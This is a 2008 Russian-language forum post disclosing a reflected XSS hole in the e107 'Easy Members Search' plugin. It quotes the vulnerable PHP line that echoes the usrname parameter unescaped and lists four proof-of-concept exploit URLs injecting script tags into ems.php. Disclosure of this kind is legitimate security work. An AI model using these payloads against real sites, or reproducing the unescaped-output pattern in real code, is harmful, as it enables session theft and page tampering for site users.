Показать сообщение отдельно

  #27  
Старый 15.12.2008, 00:31
eLWAux
Постоянный
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568

Репутация: 2399


Отправить сообщение для eLWAux с помощью ICQ
По умолчанию

e107 Easy Members Search v1.0+ XSS
http://e107.org.ru/download.php?view.149

Уязвимый продукт: Easy Members Search v1.0+
Версия: v1.0+
Условия: magic quotes off

1. XSS
Уязвимость в файле ems.php
Уязвимый кусок кода:
PHP код:
$usrname  $_GET['usrname'];
.........
<
input class='tbox' style='width:120px;' type='text' name='usrname' value='".$usrname."' /></td
xss атаку можна произвести из за недостаточной фильтации в файлах class2.php и ems.php

Exploit:
Цитата:
/e107_plugins/ems/ems.php?usrname=test' />sa<b><b
/e107_plugins/ems/ems.php?usrname=test' /><script>alert('xss')</script>
/e107_plugins/ems/ems.php?usrname=test' /><script>alert(/xss/)</script>
/e107_plugins/ems/ems.php?usrname=test' /><script>alert(/xss/)</script><b><b
 
Ответить с цитированием